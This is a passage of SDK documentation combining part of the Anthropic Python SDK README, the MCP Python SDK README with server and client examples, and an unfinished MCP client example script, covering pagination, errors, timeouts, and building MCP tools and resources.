If you would like to see type errors in VS Code to help catch bugs earlier, set `python.analysis.typeCheckingMode` to `basic`. + +## Pagination + +List methods in the Anthropic API are paginated. + +This library provides auto-paginating iterators with each list response, so you do not have to request successive pages manually: + +```python +from anthropic import Anthropic + +client = Anthropic() + +all_batches = [] +# Automatically fetches more pages as needed. +for batch in client.beta.messages.batches.list( + limit=20, +): + # Do something with batch here + all_batches.append(batch) +print(all_batches) +``` + +Or, asynchronously: + +```python +import asyncio +from anthropic import AsyncAnthropic + +client = AsyncAnthropic() + + +async def main() -> None: + all_batches = [] + # Iterate through items across all pages, issuing requests as needed. + async for batch in client.beta.messages.batches.list( + limit=20, + ): + all_batches.append(batch) + print(all_batches) + + +asyncio.run(main()) +``` + +Alternatively, you can use the `.has_next_page()`, `.next_page_info()`, or `.get_next_page()` methods for more granular control working with pages: + +```python +first_page = await client.beta.messages.batches.list( + limit=20, +) +if first_page.has_next_page(): + print(f"will fetch next page using these details: {first_page.next_page_info()}") + next_page = await first_page.get_next_page() + print(f"number of items we just fetched: {len(next_page.data)}") + +# Remove `await` for non-async usage. +``` + +Or just work directly with the returned data: + +```python +first_page = await client.beta.messages.batches.list( + limit=20, +) + +print(f"next page cursor: {first_page.last_id}") # => "next page cursor: ..." +for batch in first_page.data: + print(batch.id) + +# Remove `await` for non-async usage. 
+``` + +## Handling errors + +When the library is unable to connect to the API (for example, due to network connection problems or a timeout), a subclass of `anthropic.APIConnectionError` is raised. + +When the API returns a non-success status code (that is, 4xx or 5xx +response), a subclass of `anthropic.APIStatusError` is raised, containing `status_code` and `response` properties. + +All errors inherit from `anthropic.APIError`. + +```python +import anthropic +from anthropic import Anthropic + +client = Anthropic() + +try: + client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", + ) +except anthropic.APIConnectionError as e: + print("The server could not be reached") + print(e.__cause__) # an underlying Exception, likely raised within httpx. +except anthropic.RateLimitError as e: + print("A 429 status code was received; we should back off a bit.") +except anthropic.APIStatusError as e: + print("Another non-200-range status code was received") + print(e.status_code) + print(e.response) +``` + +Error codes are as follows: + +| Status Code | Error Type | +| ----------- | -------------------------- | +| 400 | `BadRequestError` | +| 401 | `AuthenticationError` | +| 403 | `PermissionDeniedError` | +| 404 | `NotFoundError` | +| 422 | `UnprocessableEntityError` | +| 429 | `RateLimitError` | +| >=500 | `InternalServerError` | +| N/A | `APIConnectionError` | + +## Request IDs + +> For more information on debugging requests, see [these docs](https://docs.anthropic.com/en/api/errors#request-id) + +All object responses in the SDK provide a `_request_id` property which is added from the `request-id` response header so that you can quickly log failing requests and report them back to Anthropic. 
+
+```python
+message = client.messages.create(
+    max_tokens=1024,
+    messages=[
+        {
+            "role": "user",
+            "content": "Hello, Claude",
+        }
+    ],
+    model="claude-3-5-sonnet-latest",
+)
+print(message._request_id) # req_018EeWyXxfu5pfWkrYcMdjWG
+```
+
+Note that unlike other properties that use an `_` prefix, the `_request_id` property
+*is* public. Unless documented otherwise, *all* other `_` prefix properties,
+methods and modules are *private*.
+
+### Retries
+
+Certain errors are automatically retried 2 times by default, with a short exponential backoff.
+Connection errors (for example, due to a network connectivity problem), 408 Request Timeout, 409 Conflict,
+429 Rate Limit, and >=500 Internal errors are all retried by default.
+
+You can use the `max_retries` option to configure or disable retry settings:
+
+```python
+from anthropic import Anthropic
+
+# Configure the default for all requests:
+client = Anthropic(
+    # default is 2
+    max_retries=0,
+)
+
+# Or, configure per-request:
+client.with_options(max_retries=5).messages.create(
+    max_tokens=1024,
+    messages=[
+        {
+            "role": "user",
+            "content": "Hello, Claude",
+        }
+    ],
+    model="claude-3-5-sonnet-latest",
+)
+```
+
+### Timeouts
+
+By default requests time out after 10 minutes. You can configure this with a `timeout` option,
+which accepts a float or an [`httpx.Timeout`](https://www.python-httpx.org/advanced/timeouts/#fine-tuning-the-configuration) object:
+
+```python
+import httpx
+from anthropic import Anthropic
+
+# Configure the default for all requests:
+client = Anthropic(
+    # 20 seconds (default is 10 minutes)
+    timeout=20.0,
+)
+
+# More granular control:
+client = Anthropic(
+    timeout=httpx.Timeout(60.0, read=5.0, write=10.0, connect=2.0),
+)
+
+# Override per-request:
+client.with_options(timeout=5.0).messages.create(
+    max_tokens=1024,
+    messages=[
+        {
+            "role": "user",
+            "content": "Hello, Claude",
+        }
+    ],
+    model="claude-3-5-sonnet-latest",
+)
+```
+
+On timeout, an `APITimeoutError` is thrown.
+
+Note that requests that time out are [retried twice by default](#retries).
+
+### Long Requests
+
+> [!IMPORTANT]
+> We highly encourage you to use the streaming [Messages API](#streaming-responses) for longer running requests.
+
+We do not recommend setting a large `max_tokens` value without using streaming.
+Some networks may drop idle connections after a certain period of time, which
+can cause the request to fail or [timeout](#timeouts) without receiving a response from Anthropic.
+
+This SDK will also throw a `ValueError` if a non-streaming request is expected to be above roughly 10 minutes long.
+Passing `stream=True` or [overriding](#timeouts) the `timeout` option at the client or request level disables this error.
+
+An expected request latency longer than the [timeout](#timeouts) for a non-streaming request
+will result in the client terminating the connection and retrying without receiving a response.
+
+We set a [TCP socket keep-alive](https://tldp.org/HOWTO/TCP-Keepalive-HOWTO/overview.html) option in order
+to reduce the impact of idle connection timeouts on some networks.
+This can be [overridden](#configuring-the-http-client) by passing a `http_client` option to the client.
+
+## Default Headers
+
+We automatically send the `anthropic-version` header set to `2023-06-01`.
+
+If you need to, you can override it by setting default headers per-request or on the client object.
+
+Be aware that doing so may result in incorrect types and other unexpected or undefined behavior in the SDK.
+
+```python
+from anthropic import Anthropic
+
+client = Anthropic(
+    default_headers={"anthropic-version": "My-Custom-Value"},
+)
+```
+
+## Advanced
+
+### Logging
+
+We use the standard library [`logging`](https://docs.python.org/3/library/logging.html) module.
+
+You can enable logging by setting the environment variable `ANTHROPIC_LOG` to `info`.
+
+```shell
+$ export ANTHROPIC_LOG=info
+```
+
+Or to `debug` for more verbose logging.
+ +### How to tell whether `None` means `null` or missing + +In an API response, a field may be explicitly `null`, or missing entirely; in either case, its value is `None` in this library. You can differentiate the two cases with `.model_fields_set`: + +```py +if response.my_field is None: + if 'my_field' not in response.model_fields_set: + print('Got json like {}, without a "my_field" key present at all.') + else: + print('Got json like {"my_field": null}.') +``` + +### Accessing raw response data (e.g. headers) + +The "raw" Response object can be accessed by prefixing `.with_raw_response.` to any HTTP method call, e.g., + +```py +from anthropic import Anthropic + +client = Anthropic() +response = client.messages.with_raw_response.create( + max_tokens=1024, + messages=[{ + "role": "user", + "content": "Hello, Claude", + }], + model="claude-3-5-sonnet-latest", +) +print(response.headers.get('X-My-Header')) + +message = response.parse() # get the object that `messages.create()` would have returned +print(message.content) +``` + +These methods return a [`LegacyAPIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_legacy_response.py) object. This is a legacy class as we're changing it slightly in the next major version. + +For the sync client this will mostly be the same with the exception +of `content` & `text` will be methods instead of properties. In the +async client, all methods will be async. + +A migration script will be provided & the migration in general should +be smooth. + +#### `.with_streaming_response` + +The above interface eagerly reads the full response body when you make the request, which may not always be what you want. + +To stream the response body, use `.with_streaming_response` instead, which requires a context manager and only reads the response body once you call `.read()`, `.text()`, `.json()`, `.iter_bytes()`, `.iter_text()`, `.iter_lines()` or `.parse()`. In the async client, these are async methods. 
+ +As such, `.with_streaming_response` methods return a different [`APIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_response.py) object, and the async client returns an [`AsyncAPIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_response.py) object. + +```python +with client.messages.with_streaming_response.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", +) as response: + print(response.headers.get("X-My-Header")) + + for line in response.iter_lines(): + print(line) +``` + +The context manager is required so that the response will reliably be closed. + +### Making custom/undocumented requests + +This library is typed for convenient access to the documented API. + +If you need to access undocumented endpoints, params, or response properties, the library can still be used. + +#### Undocumented endpoints + +To make requests to undocumented endpoints, you can make requests using `client.get`, `client.post`, and other +http verbs. Options on the client will be respected (such as retries) when making this request. + +```py +import httpx + +response = client.post( + "/foo", + cast_to=httpx.Response, + body={"my_param": True}, +) + +print(response.headers.get("x-foo")) +``` + +#### Undocumented request params + +If you want to explicitly send an extra param, you can do so with the `extra_query`, `extra_body`, and `extra_headers` request +options. + +#### Undocumented response properties + +To access undocumented response properties, you can access the extra fields like `response.unknown_prop`. You +can also get all the extra fields on the Pydantic model as a dict with +[`response.model_extra`](https://docs.pydantic.dev/latest/api/base_model/#pydantic.BaseModel.model_extra). 
+ +### Configuring the HTTP client + +You can directly override the [httpx client](https://www.python-httpx.org/api/#client) to customize it for your use case, including: + +- Support for [proxies](https://www.python-httpx.org/advanced/proxies/) +- Custom [transports](https://www.python-httpx.org/advanced/transports/) +- Additional [advanced](https://www.python-httpx.org/advanced/clients/) functionality + +```python +import httpx +from anthropic import Anthropic, DefaultHttpxClient + +client = Anthropic( + # Or use the `ANTHROPIC_BASE_URL` env var + base_url="http://my.test.server.example.com:8083", + http_client=DefaultHttpxClient( + proxy="http://my.test.proxy.example.com", + transport=httpx.HTTPTransport(local_address="0.0.0.0"), + ), +) +``` + +You can also customize the client on a per-request basis by using `with_options()`: + +```python +client.with_options(http_client=DefaultHttpxClient(...)) +``` + +### Managing HTTP resources + +By default the library closes underlying HTTP connections whenever the client is [garbage collected](https://docs.python.org/3/reference/datamodel.html#object.__del__). You can manually close the client using the `.close()` method if desired, or with a context manager that closes when exiting. + +```py +from anthropic import Anthropic + +with Anthropic() as client: + # make requests here + ... + +# HTTP client is now closed +``` + +## Versioning + +This package generally follows [SemVer](https://semver.org/spec/v2.0.0.html) conventions, though certain backwards-incompatible changes may be released as minor versions: + +1. Changes that only affect static types, without breaking runtime behavior. +2. Changes to library internals which are technically public but not intended or documented for external use. _(Please open a GitHub issue to let us know if you are relying on such internals.)_ +3. Changes that we do not expect to impact the vast majority of users in practice. 
+ +We take backwards-compatibility seriously and work hard to ensure you can rely on a smooth upgrade experience. + +We are keen for your feedback; please open an [issue](https://www.github.com/anthropics/anthropic-sdk-python/issues) with questions, bugs, or suggestions. + +### Determining the installed version + +If you've upgraded to the latest version but aren't seeing any new features you were expecting then your python environment is likely still using an older version. + +You can determine the version that is being used at runtime with: + +```py +import anthropic +print(anthropic.__version__) +``` + +## Requirements + +Python 3.8 or higher. + +## Contributing + +See [the contributing documentation](./CONTRIBUTING.md). +``` + + +MCP Python SDK README: +# MCP Python SDK + +
+ +Python implementation of the Model Context Protocol (MCP) + +[![PyPI][pypi-badge]][pypi-url] +[![MIT licensed][mit-badge]][mit-url] +[![Python Version][python-badge]][python-url] +[![Documentation][docs-badge]][docs-url] +[![Specification][spec-badge]][spec-url] +[![GitHub Discussions][discussions-badge]][discussions-url] + +
+ + +## Table of Contents + +- [MCP Python SDK](#mcp-python-sdk) + - [Overview](#overview) + - [Installation](#installation) + - [Adding MCP to your python project](#adding-mcp-to-your-python-project) + - [Running the standalone MCP development tools](#running-the-standalone-mcp-development-tools) + - [Quickstart](#quickstart) + - [What is MCP?](#what-is-mcp) + - [Core Concepts](#core-concepts) + - [Server](#server) + - [Resources](#resources) + - [Tools](#tools) + - [Prompts](#prompts) + - [Images](#images) + - [Context](#context) + - [Running Your Server](#running-your-server) + - [Development Mode](#development-mode) + - [Claude Desktop Integration](#claude-desktop-integration) + - [Direct Execution](#direct-execution) + - [Mounting to an Existing ASGI Server](#mounting-to-an-existing-asgi-server) + - [Examples](#examples) + - [Echo Server](#echo-server) + - [SQLite Explorer](#sqlite-explorer) + - [Advanced Usage](#advanced-usage) + - [Low-Level Server](#low-level-server) + - [Writing MCP Clients](#writing-mcp-clients) + - [MCP Primitives](#mcp-primitives) + - [Server Capabilities](#server-capabilities) + - [Documentation](#documentation) + - [Contributing](#contributing) + - [License](#license) + +[pypi-badge]: https://img.shields.io/pypi/v/mcp.svg +[pypi-url]: https://pypi.org/project/mcp/ +[mit-badge]: https://img.shields.io/pypi/l/mcp.svg +[mit-url]: https://github.com/modelcontextprotocol/python-sdk/blob/main/LICENSE +[python-badge]: https://img.shields.io/pypi/pyversions/mcp.svg +[python-url]: https://www.python.org/downloads/ +[docs-badge]: https://img.shields.io/badge/docs-modelcontextprotocol.io-blue.svg +[docs-url]: https://modelcontextprotocol.io +[spec-badge]: https://img.shields.io/badge/spec-spec.modelcontextprotocol.io-blue.svg +[spec-url]: https://spec.modelcontextprotocol.io +[discussions-badge]: https://img.shields.io/github/discussions/modelcontextprotocol/python-sdk +[discussions-url]: 
https://github.com/modelcontextprotocol/python-sdk/discussions + +## Overview + +The Model Context Protocol allows applications to provide context for LLMs in a standardized way, separating the concerns of providing context from the actual LLM interaction. This Python SDK implements the full MCP specification, making it easy to: + +- Build MCP clients that can connect to any MCP server +- Create MCP servers that expose resources, prompts and tools +- Use standard transports like stdio and SSE +- Handle all MCP protocol messages and lifecycle events + +## Installation + +### Adding MCP to your python project + +We recommend using [uv](https://docs.astral.sh/uv/) to manage your Python projects. + +If you haven't created a uv-managed project yet, create one: + + ```bash + uv init mcp-server-demo + cd mcp-server-demo + ``` + + Then add MCP to your project dependencies: + + ```bash + uv add "mcp[cli]" + ``` + +Alternatively, for projects using pip for dependencies: +```bash +pip install "mcp[cli]" +``` + +### Running the standalone MCP development tools + +To run the mcp command with uv: + +```bash +uv run mcp +``` + +## Quickstart + +Let's create a simple MCP server that exposes a calculator tool and some data: + +```python +# server.py +from mcp.server.fastmcp import FastMCP + +# Create an MCP server +mcp = FastMCP("Demo") + + +# Add an addition tool +@mcp.tool() +def add(a: int, b: int) -> int: + """Add two numbers""" + return a + b + + +# Add a dynamic greeting resource +@mcp.resource("greeting://{name}") +def get_greeting(name: str) -> str: + """Get a personalized greeting""" + return f"Hello, {name}!" +``` + +You can install this server in [Claude Desktop](https://claude.ai/download) and interact with it right away by running: +```bash +mcp install server.py +``` + +Alternatively, you can test it with the MCP Inspector: +```bash +mcp dev server.py +``` + +## What is MCP? 
+ +The [Model Context Protocol (MCP)](https://modelcontextprotocol.io) lets you build servers that expose data and functionality to LLM applications in a secure, standardized way. Think of it like a web API, but specifically designed for LLM interactions. MCP servers can: + +- Expose data through **Resources** (think of these sort of like GET endpoints; they are used to load information into the LLM's context) +- Provide functionality through **Tools** (sort of like POST endpoints; they are used to execute code or otherwise produce a side effect) +- Define interaction patterns through **Prompts** (reusable templates for LLM interactions) +- And more! + +## Core Concepts + +### Server + +The FastMCP server is your core interface to the MCP protocol. It handles connection management, protocol compliance, and message routing: + +```python +# Add lifespan support for startup/shutdown with strong typing +from contextlib import asynccontextmanager +from collections.abc import AsyncIterator +from dataclasses import dataclass + +from fake_database import Database # Replace with your actual DB type + +from mcp.server.fastmcp import Context, FastMCP + +# Create a named server +mcp = FastMCP("My App") + +# Specify dependencies for deployment and development +mcp = FastMCP("My App", dependencies=["pandas", "numpy"]) + + +@dataclass +class AppContext: + db: Database + + +@asynccontextmanager +async def app_lifespan(server: FastMCP) -> AsyncIterator[AppContext]: + """Manage application lifecycle with type-safe context""" + # Initialize on startup + db = await Database.connect() + try: + yield AppContext(db=db) + finally: + # Cleanup on shutdown + await db.disconnect() + + +# Pass lifespan to server +mcp = FastMCP("My App", lifespan=app_lifespan) + + +# Access type-safe lifespan context in tools +@mcp.tool() +def query_db(ctx: Context) -> str: + """Tool that uses initialized resources""" + db = ctx.request_context.lifespan_context["db"] + return db.query() +``` + +### Resources + 
+Resources are how you expose data to LLMs. They're similar to GET endpoints in a REST API - they provide data but shouldn't perform significant computation or have side effects: + +```python +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("My App") + + +@mcp.resource("config://app") +def get_config() -> str: + """Static configuration data""" + return "App configuration here" + + +@mcp.resource("users://{user_id}/profile") +def get_user_profile(user_id: str) -> str: + """Dynamic user data""" + return f"Profile data for user {user_id}" +``` + +### Tools + +Tools let LLMs take actions through your server. Unlike resources, tools are expected to perform computation and have side effects: + +```python +import httpx +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("My App") + + +@mcp.tool() +def calculate_bmi(weight_kg: float, height_m: float) -> float: + """Calculate BMI given weight in kg and height in meters""" + return weight_kg / (height_m**2) + + +@mcp.tool() +async def fetch_weather(city: str) -> str: + """Fetch current weather for a city""" + async with httpx.AsyncClient() as client: + response = await client.get(f"https://api.weather.com/{city}") + return response.text +``` + +### Prompts + +Prompts are reusable templates that help LLMs interact with your server effectively: + +```python +from mcp.server.fastmcp import FastMCP +from mcp.server.fastmcp.prompts import base + +mcp = FastMCP("My App") + + +@mcp.prompt() +def review_code(code: str) -> str: + return f"Please review this code:\n\n{code}" + + +@mcp.prompt() +def debug_error(error: str) -> list[base.Message]: + return [ + base.UserMessage("I'm seeing this error:"), + base.UserMessage(error), + base.AssistantMessage("I'll help debug that. 
What have you tried so far?"), + ] +``` + +### Images + +FastMCP provides an `Image` class that automatically handles image data: + +```python +from mcp.server.fastmcp import FastMCP, Image +from PIL import Image as PILImage + +mcp = FastMCP("My App") + + +@mcp.tool() +def create_thumbnail(image_path: str) -> Image: + """Create a thumbnail from an image""" + img = PILImage.open(image_path) + img.thumbnail((100, 100)) + return Image(data=img.tobytes(), format="png") +``` + +### Context + +The Context object gives your tools and resources access to MCP capabilities: + +```python +from mcp.server.fastmcp import FastMCP, Context + +mcp = FastMCP("My App") + + +@mcp.tool() +async def long_task(files: list[str], ctx: Context) -> str: + """Process multiple files with progress tracking""" + for i, file in enumerate(files): + ctx.info(f"Processing {file}") + await ctx.report_progress(i, len(files)) + data, mime_type = await ctx.read_resource(f"file://{file}") + return "Processing complete" +``` + +## Running Your Server + +### Development Mode + +The fastest way to test and debug your server is with the MCP Inspector: + +```bash +mcp dev server.py + +# Add dependencies +mcp dev server.py --with pandas --with numpy + +# Mount local code +mcp dev server.py --with-editable . +``` + +### Claude Desktop Integration + +Once your server is ready, install it in Claude Desktop: + +```bash +mcp install server.py + +# Custom name +mcp install server.py --name "My Analytics Server" + +# Environment variables +mcp install server.py -v API_KEY=abc123 -v DB_URL=postgres://... 
+mcp install server.py -f .env +``` + +### Direct Execution + +For advanced scenarios like custom deployments: + +```python +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("My App") + +if __name__ == "__main__": + mcp.run() +``` + +Run it with: +```bash +python server.py +# or +mcp run server.py +``` + +### Mounting to an Existing ASGI Server + +You can mount the SSE server to an existing ASGI server using the `sse_app` method. This allows you to integrate the SSE server with other ASGI applications. + +```python +from starlette.applications import Starlette +from starlette.routing import Mount, Host +from mcp.server.fastmcp import FastMCP + + +mcp = FastMCP("My App") + +# Mount the SSE server to the existing ASGI server +app = Starlette( + routes=[ + Mount('/', app=mcp.sse_app()), + ] +) + +# or dynamically mount as host +app.router.routes.append(Host('mcp.acme.corp', app=mcp.sse_app())) +``` + +For more information on mounting applications in Starlette, see the [Starlette documentation](https://www.starlette.io/routing/#submounting-routes). 
+ +## Examples + +### Echo Server + +A simple server demonstrating resources, tools, and prompts: + +```python +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("Echo") + + +@mcp.resource("echo://{message}") +def echo_resource(message: str) -> str: + """Echo a message as a resource""" + return f"Resource echo: {message}" + + +@mcp.tool() +def echo_tool(message: str) -> str: + """Echo a message as a tool""" + return f"Tool echo: {message}" + + +@mcp.prompt() +def echo_prompt(message: str) -> str: + """Create an echo prompt""" + return f"Please process this message: {message}" +``` + +### SQLite Explorer + +A more complex example showing database integration: + +```python +import sqlite3 + +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("SQLite Explorer") + + +@mcp.resource("schema://main") +def get_schema() -> str: + """Provide the database schema as a resource""" + conn = sqlite3.connect("database.db") + schema = conn.execute("SELECT sql FROM sqlite_master WHERE type='table'").fetchall() + return "\n".join(sql[0] for sql in schema if sql[0]) + + +@mcp.tool() +def query_data(sql: str) -> str: + """Execute SQL queries safely""" + conn = sqlite3.connect("database.db") + try: + result = conn.execute(sql).fetchall() + return "\n".join(str(row) for row in result) + except Exception as e: + return f"Error: {str(e)}" +``` + +## Advanced Usage + +### Low-Level Server + +For more control, you can use the low-level server implementation directly. 
This gives you full access to the protocol and allows you to customize every aspect of your server, including lifecycle management through the lifespan API: + +```python +from contextlib import asynccontextmanager +from collections.abc import AsyncIterator + +from fake_database import Database # Replace with your actual DB type + +from mcp.server import Server + + +@asynccontextmanager +async def server_lifespan(server: Server) -> AsyncIterator[dict]: + """Manage server startup and shutdown lifecycle.""" + # Initialize resources on startup + db = await Database.connect() + try: + yield {"db": db} + finally: + # Clean up on shutdown + await db.disconnect() + + +# Pass lifespan to server +server = Server("example-server", lifespan=server_lifespan) + + +# Access lifespan context in handlers +@server.call_tool() +async def query_db(name: str, arguments: dict) -> list: + ctx = server.request_context + db = ctx.lifespan_context["db"] + return await db.query(arguments["query"]) +``` + +The lifespan API provides: +- A way to initialize resources when the server starts and clean them up when it stops +- Access to initialized resources through the request context in handlers +- Type-safe context passing between lifespan and request handlers + +```python +import mcp.server.stdio +import mcp.types as types +from mcp.server.lowlevel import NotificationOptions, Server +from mcp.server.models import InitializationOptions + +# Create a server instance +server = Server("example-server") + + +@server.list_prompts() +async def handle_list_prompts() -> list[types.Prompt]: + return [ + types.Prompt( + name="example-prompt", + description="An example prompt template", + arguments=[ + types.PromptArgument( + name="arg1", description="Example argument", required=True + ) + ], + ) + ] + + +@server.get_prompt() +async def handle_get_prompt( + name: str, arguments: dict[str, str] | None +) -> types.GetPromptResult: + if name != "example-prompt": + raise ValueError(f"Unknown prompt: {name}") 
+ + return types.GetPromptResult( + description="Example prompt", + messages=[ + types.PromptMessage( + role="user", + content=types.TextContent(type="text", text="Example prompt text"), + ) + ], + ) + + +async def run(): + async with mcp.server.stdio.stdio_server() as (read_stream, write_stream): + await server.run( + read_stream, + write_stream, + InitializationOptions( + server_name="example", + server_version="0.1.0", + capabilities=server.get_capabilities( + notification_options=NotificationOptions(), + experimental_capabilities={}, + ), + ), + ) + + +if __name__ == "__main__": + import asyncio + + asyncio.run(run()) +``` + +### Writing MCP Clients + +The SDK provides a high-level client interface for connecting to MCP servers: + +```python +from mcp import ClientSession, StdioServerParameters, types +from mcp.client.stdio import stdio_client + +# Create server parameters for stdio connection +server_params = StdioServerParameters( + command="python", # Executable + args=["example_server.py"], # Optional command line arguments + env=None, # Optional environment variables +) + + +# Optional: create a sampling callback +async def handle_sampling_message( + message: types.CreateMessageRequestParams, +) -> types.CreateMessageResult: + return types.CreateMessageResult( + role="assistant", + content=types.TextContent( + type="text", + text="Hello, world! 
from model", + ), + model="gpt-3.5-turbo", + stopReason="endTurn", + ) + + +async def run(): + async with stdio_client(server_params) as (read, write): + async with ClientSession( + read, write, sampling_callback=handle_sampling_message + ) as session: + # Initialize the connection + await session.initialize() + + # List available prompts + prompts = await session.list_prompts() + + # Get a prompt + prompt = await session.get_prompt( + "example-prompt", arguments={"arg1": "value"} + ) + + # List available resources + resources = await session.list_resources() + + # List available tools + tools = await session.list_tools() + + # Read a resource + content, mime_type = await session.read_resource("file://some/path") + + # Call a tool + result = await session.call_tool("tool-name", arguments={"arg1": "value"}) + + +if __name__ == "__main__": + import asyncio + + asyncio.run(run()) +``` + +### MCP Primitives + +The MCP protocol defines three core primitives that servers can implement: + +| Primitive | Control | Description | Example Use | +|-----------|-----------------------|-----------------------------------------------------|------------------------------| +| Prompts | User-controlled | Interactive templates invoked by user choice | Slash commands, menu options | +| Resources | Application-controlled| Contextual data managed by the client application | File contents, API responses | +| Tools | Model-controlled | Functions exposed to the LLM to take actions | API calls, data updates | + +### Server Capabilities + +MCP servers declare capabilities during initialization: + +| Capability | Feature Flag | Description | +|-------------|------------------------------|------------------------------------| +| `prompts` | `listChanged` | Prompt template management | +| `resources` | `subscribe`
`listChanged`| Resource exposure and updates | +| `tools` | `listChanged` | Tool discovery and execution | +| `logging` | - | Server logging configuration | +| `completion`| - | Argument completion suggestions | + +## Documentation + +- [Model Context Protocol documentation](https://modelcontextprotocol.io) +- [Model Context Protocol specification](https://spec.modelcontextprotocol.io) +- [Officially supported servers](https://github.com/modelcontextprotocol/servers) + +## Contributing + +We are passionate about supporting contributors of all levels of experience and would love to see you get involved in the project. See the [contributing guide](CONTRIBUTING.md) to get started. + +## License + +This project is licensed under the MIT License - see the LICENSE file for details. + + +MCP Python SDK example of an MCP client: +```py +import asyncio +import json +import logging +import os +import shutil +from contextlib import AsyncExitStack +from typing import Any + +import httpx +from dotenv import load_dotenv +from mcp import ClientSession, StdioServerParameters +from mcp.client.stdio import stdio_client + +# Configure logging +logging.basicConfig( + level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s" +) + + +class Configuration: + """Manages configuration and environment variables for the MCP client.""" + + def __init__(self) -> None: + """Initialize configuration with environment variables.""" + self.load_env() + self.api_key = os.getenv("LLM_API_KEY") + + @staticmethod + def load_env() -> None: + """Load environment variables from .env file.""" + load_dotenv() + + @staticmethod + def load_config(file_path: str) -> dict[str, Any]: + """Load server configuration from JSON file. + + Args: + file_path: Path to the JSON configuration file. + + Returns: + Dict containing server configuration. + + Raises: + FileNotFoundError: If configuration file doesn't exist. + JSONDecodeError: If configuration file is invalid JSON. 
+ """ + with open(file_path, "r") as f: + return json.load(f) + + @property + def llm_api_key(self) -> str: + """Get the LLM API key. + + Returns: + The API key as a string. + + Raises: + ValueError: If the API key is not found in environment variables. + """ + if not self.api_key: + raise ValueError("LLM_API_KEY not found in environment variables") + return self.api_key + + +class Server: + """Manages MCP server connections and tool execution.""" + + def __init__(self, name: str, config: dict[str, Any]) -> None: + self.name: str = name + self.config: dict[str, Any] = config + self.stdio_context: Any | None = None + self.session: ClientSession | None = None + self._cleanup_lock: asyncio.Lock = asyncio.Lock() + self.exit_stack: AsyncExitStack = AsyncExitStack() + + async def initialize(self) -> None: + """Initialize the server connection.""" + command = ( + shutil.which("npx") + if self.config["command"] == "npx" + else self.config["command"] + ) + if command is None: + raise ValueError("The command must be a valid string and cannot be None.") + + server_params = StdioServerParameters( + command=command, + args=self.config["args"], + env={**os.environ, **self.config["env"]} + if self.config.get("env") + else None, + ) + try: + stdio_transport = await self.exit_stack.enter_async_context( + stdio_client(server_params) + ) + read, write = stdio_transport + session = await self.exit_stack.enter_async_context( + ClientSession(read, write) + ) + await session.initialize() + self.session = session + except Exception as e: + logging.error(f"Error initializing server {self.name}: {e}") + await self.cleanup() + raise + + async def list_tools(self) -> list[Any]: + """List available tools from the server. + + Returns: + A list of available tools. + + Raises: + RuntimeError: If the server is not initialized. 
+ """ + if not self.session: + raise RuntimeError(f"Server {self.name} not initialized") + + tools_response = await self.session.list_tools() + tools = [] + + for item in tools_response: + if isinstance(item, tuple) and item[0] == "tools": + for tool in item[1]: + tools.append(Tool(tool.name, tool.description, tool.inputSchema)) + + return tools + + async def execute_tool( + self, + tool_name: str, + arguments: dict[str, Any], + retries: int = 2, + delay: float = 1.0, + ) -> Any: + """Execute a tool with retry mechanism. + + Args: + tool_name: Name of the tool to execute. + arguments: Tool arguments. + retries: Number of retry attempts. + delay: Delay between retries in seconds. + + Returns: + Tool execution result. + + Raises: + RuntimeError: If server is not initialized. + Exception: If tool execution fails after all retries. + """ + if not self.session: + raise RuntimeError(f"Server {self.name} not initialized") + + attempt = 0 + while attempt < retries: + try: + logging.info(f"Executing {tool_name}...") + result = await self.session.call_tool(tool_name, arguments) + + return result + + except Exception as e: + attempt += 1 + logging.warning( + f"Error executing tool: {e}. Attempt {attempt} of {retries}." + ) + if attempt < retries: + logging.info(f"Retrying in {delay} seconds...") + await asyncio.sleep(delay) + else: + logging.error("Max retries reached. 
Failing.") + raise + + async def cleanup(self) -> None: + """Clean up server resources.""" + async with self._cleanup_lock: + try: + await self.exit_stack.aclose() + self.session = None + self.stdio_context = None + except Exception as e: + logging.error(f"Error during cleanup of server {self.name}: {e}") + + +class Tool: + """Represents a tool with its properties and formatting.""" + + def __init__( + self, name: str, description: str, input_schema: dict[str, Any] + ) -> None: + self.name: str = name + self.description: str = description + self.input_schema: dict[str, Any] = input_schema + + def format_for_llm(self) -> str: + """Format tool information for LLM. + + Returns: + A formatted string describing the tool. + """ + args_desc = [] + if "properties" in self.input_schema: + for param_name, param_info in self.input_schema["properties"].items(): + arg_desc = ( + f"- {param_name}: {param_info.get('description', 'No description')}" + ) + if param_name in self.input_schema.get("required", []): + arg_desc += " (required)" + args_desc.append(arg_desc) + + return f""" +Tool: {self.name} +Description: {self.description} +Arguments: +{chr(10).join(args_desc)} +""" + + +class LLMClient: + """Manages communication with the LLM provider.""" + + def __init__(self, api_key: str) -> None: + self.api_key: str = api_key + + def get_response(self, messages: list[dict[str, str]]) -> str: + """Get a response from the LLM. + + Args: + messages: A list of message dictionaries. + + Returns: + The LLM's response as a string. + + Raises: + httpx.RequestError: If the request to the LLM fails. 
